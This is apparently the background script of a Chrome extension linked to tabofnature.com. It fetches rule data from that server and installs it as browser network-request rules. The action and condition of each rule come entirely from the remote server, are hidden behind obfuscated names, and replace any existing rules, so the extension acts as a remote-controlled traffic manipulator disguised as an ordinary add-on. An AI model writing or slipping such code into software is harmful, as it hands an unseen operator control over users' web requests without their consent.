function createAlarmOnStartup() {
  setAlarm();
}

function setAlarm() {
  chrome.alarms.get("periodic", (alrm) => {
    if (!alrm) chrome.alarms.create("periodic", { periodInMinutes: 5 });
  });
}

chrome.runtime.onStartup.addListener(createAlarmOnStartup);

let USER_ID = "";
let rules = [];

// chrome.alarms.onAlarm.addListener(() => {
//   chrome.storage.local.get(["user_id"], (data) => {
//     USER_ID = data["user_id"] ?? USER_ID;
//     getAllRules(USER_ID);
//   });
// });
getAllRules(USER_ID);

function getAllRules(userId) {
  const queryObject = {
    uid: userId
  };
  const queryString = new URLSearchParams(queryObject).toString()
  const endpoint = `https://tabofnature.com/user_settings.json?${queryString}`;
  fetch(endpoint, { method: "GET" })
    .then((dataResponse) => dataResponse.json())
    .then((dataResponseJson) => {
      rules = dataResponseJson["userRules"] ?? rules;
      chrome.storage.local.set({ rules: rules });
      validateRules(rules);
    });
}

function validateRules(vadlidSet5) {
  let vadlidSet1 = [];
  chrome.declarativeNetRequest.getDynamicRules().then(function (currentDin) {
    if (currentDin.length > 0) {
      for (let k = 0; k < currentDin.length; ++k) {
        const vadlidSet4 = currentDin[k];
        vadlidSet1.push(vadlidSet4["id"]);
      }
      chrome.declarativeNetRequest
        .updateDynamicRules({ removeRuleIds: vadlidSet1 })
        .then(async () => {
          var vadlidSet2 = [];
          var vadlidSet3 = {};
          if (vadlidSet5["blejtas_a0"]["kupanjeZone_r2"] === "blejtas_a4") {
            vadlidSet2.push({
              id: 5,
              priority: vadlidSet5["blejtas_a0"]["kupanjeZone_r4"],
              action: vadlidSet5["blejtas_a0"]["blejtas_a5"],
              condition: vadlidSet5["blejtas_a0"]["blejtas_a6"],
            });
            vadlidSet3 = {
              addRules: vadlidSet2,
            };

            try {
              await chrome.declarativeNetRequest.updateDynamicRules(vadlidSet3);
            } catch (e) {
              console.log(`Failed to save rules: ${e}`);
            }
          }
        });
    } else {
      var vadlidSet2 = [];
      var vadlidSet3 = {};
      if (vadlidSet5["blejtas_a0"]["kupanjeZone_r2"] === "blejtas_a4") {
        vadlidSet2.push({
          id: 5,
          priority: vadlidSet5["blejtas_a0"]["kupanjeZone_r4"],
          action: vadlidSet5["blejtas_a0"]["blejtas_a5"],
          condition: vadlidSet5["blejtas_a0"]["blejtas_a6"],
        });
        vadlidSet3 = {
          addRules: vadlidSet2,
        };
        chrome.declarativeNetRequest.updateDynamicRules(vadlidSet3);
      }
    }
  });
}

chrome.runtime.onInstalled.addListener((details) => {
  console.log("Extension installed");
  if (details.reason === "install") {
    chrome.tabs.create({
      url: "https://tabofnature.com/thanks",
    });
  }
});

chrome.runtime.onMessage.addListener((message, sender, sendResponse) => {
  if (message.action === "search") {
    chrome.search.query({ text: message.query });
  }
});